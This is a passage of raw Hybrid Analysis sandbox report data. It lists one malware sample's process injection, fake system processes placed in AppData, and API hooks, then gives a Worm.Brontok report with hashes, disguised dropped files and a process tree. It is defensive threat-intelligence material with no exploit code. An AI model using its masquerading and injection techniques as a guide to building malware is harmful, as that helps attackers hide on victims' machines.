\"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 312)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 312)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 312)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 312)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 312)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 596)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 596)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 596)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 632)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 632)\n \"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 632)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 376)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 428)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 428)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 428)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 428)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 376)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\" allocated memory in \"C:\\019179afe76c122e3fa55ec27b73f6c56d923557814f2af0cb0e1c3db41f74f6.exe\"\n \"D3_08.exe\" allocated memory in \"%WINDIR%\\D3_08.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005792)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005588)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001440)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005760)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003332)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00000964)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005724)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004392)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004248)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00006052)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004308)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003580)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004268)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004240)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004580)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003456)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004416)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004500)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002728)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001888)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002176)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003648)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004512)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003880)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004104)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003856)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00000272)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003012)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00000296)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002640)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004180)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003812)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004652)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00000416)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002784)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002496)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002160)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004668)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003196)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004488)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004000)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"D3_08.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"CSRSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"D3_08.exe\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"\n \"send@WS2_32.DLL\" in \"CSRSS.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199
https://hybrid-analysis.com/sample/53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199
Hybrid Analysis - Killers
{"size": 93606, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "av_detect": 87, "vx_family": "Worm.Brontok", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 136, "extracted_files": [{"name": "services.exe", "file_size": 93606, "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "lsass.exe", "file_size": 93606, "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 93606, "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "4k51k4.exe", "file_size": 93606, "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "winlogon.exe", "file_size": 93606, "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "smss.exe", "file_size": 93606, "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "csrss.exe", "file_size": 93606, "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 93606, "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 93606, "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 93606, "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 93606, "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 93606, "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22, "file_available_to_download": true}, {"name": "shell.exe", "file_size": 93606, "sha256": "627858cb87352696002f7c172dcabdd579b4793dfb37f4fa414d7729f14a2e25", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_size": 93606, "sha256": "fa8d1d17f7bec1507286d1e375efa1e69973b33b5806c4dae916e3554aa23dbb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS .exe", "file_size": 93606, "sha256": "97dc3f79db0200d632c1b65f06c3959c45cc96da09913564c694db9655f651bd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_size": 93606, "sha256": "6eed801d0971c826307c4d9dada9b306f58f7fef4cafdcb1258b4fae54045129", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_size": 93606, "sha256": "7033cc53e52442cfd99f9dfd5434757f8a25d1bec9f455cdbab0c917ce1a7e2c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Empty.pif", "file_size": 93606, "sha256": "5fadb04736f244139c2fad1536f494dd1cbf8a789404eae3c7f3254e27230d6e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE.bin", "file_size": 93606, "sha256": "602b68c9275f362e342471d2def8aa3b01c47ffed36c0028e3b9e011bc790a6a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 93606, "sha256": "9517a5191067301b3cfc053dfa929b74bfa66c3a4e99718010b05bd3b3fda58c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 93606, "sha256": "fa8d1d17f7bec1507286d1e375efa1e69973b33b5806c4dae916e3554aa23dbb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C456.bin", "file_size": 93606, "sha256": "9cb84913dec874677e3a8e4974caed53bee7d92b857baf7254d1780f44479851", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 93606, "sha256": "f63a73c493555e2e30966620d97e526237ffaf923f0e240448f21b2a0dec6182", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 93606, "sha256": "86862d2df7d851050111f61f1284fa452eecf1fc358865e1dd95ec0688fd15bd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MrHelloween.scr", "file_size": 93606, "sha256": "778790606dd94b0ac3ab5de696120d4763b0da8a2c27c5665123e14b54a5db10", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C711.bin", "file_size": 93606, "sha256": "a15a94e364df82fde8fd585fff9b3ec799a23f4dff70438bd8a0bb75438b469e", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C458.bin", "file_size": 93606, "sha256": "4e2fd38cf8a64c46ffd844a09a42ada0141140cab705a49876e9c0fec9613dbd", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Folder.htt", "file_size": 640, "sha256": "fe222b08327bbfb35cbd627c0526ba7b5755b02ce0a95823a4c0bf58e601d061", "type_tags": ["html"], "description": "HTML document, ASCII text, with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Puisi.txt", "file_size": 442, "sha256": "660ecfcd91ba19959d0c348724da95d7fd6dd57359898e6e3bcce600ff3c797d", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "desktop.ini", "file_size": 221, "sha256": "a0dd10de1158a4d05ea916c190bf95dc4c53ae3851c47ab8449a9ce96943334f", "type_tags": ["unknown"], "description": "Windows desktop.ini", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 93606, "sha256": "9517a5191067301b3cfc053dfa929b74bfa66c3a4e99718010b05bd3b3fda58c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C8F5.bin", "file_size": 93606, "sha256": "9517a5191067301b3cfc053dfa929b74bfa66c3a4e99718010b05bd3b3fda58c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9CBEA.bin", "file_size": 93606, "sha256": "fa8d1d17f7bec1507286d1e375efa1e69973b33b5806c4dae916e3554aa23dbb", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 93606, "sha256": "602b68c9275f362e342471d2def8aa3b01c47ffed36c0028e3b9e011bc790a6a", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 93606, "sha256": "9517a5191067301b3cfc053dfa929b74bfa66c3a4e99718010b05bd3b3fda58c", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005648", "name": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe", "normalized_path": "C:\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe", "sha256": "53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199", "av_label": "Worm.Brontok", "av_matched": 15, "av_total": 22}, {"uid": "00000000-00005900", "parentuid": "00000000-00005648", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "9cb84913dec874677e3a8e4974caed53bee7d92b857baf7254d1780f44479851"}, {"uid": "00000000-00005968", "parentuid": "00000000-00005900", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "9cb84913dec874677e3a8e4974caed53bee7d92b857baf7254d1780f44479851"}, {"uid": "00000000-00005832", "parentuid": "00000000-00005900", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "4e2fd38cf8a64c46ffd844a09a42ada0141140cab705a49876e9c0fec9613dbd"}, {"uid": "00000000-00005796", "parentuid": "00000000-00005900", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "3c5bd74d7881744f3615565c1e582ea39078c18ef77c9ccb23816b96c77cae6d"}, {"uid": "00000000-00006100", "parentuid": "00000000-00005900", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "12d325d570818306f658c3b2eb62d6c36afc4ec3806024300e2ec350499d9df1"}, {"uid": "00000000-00002460", "parentuid": "00000000-00006100", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "9cb84913dec874677e3a8e4974caed53bee7d92b857baf7254d1780f44479851"}, {"uid": "00000000-00002296", "parentuid": "00000000-00006100", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "4e2fd38cf8a64c46ffd844a09a42ada0141140cab705a49876e9c0fec9613dbd"}, {"uid": "00000000-00004120", "parentuid": "00000000-00006100", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", 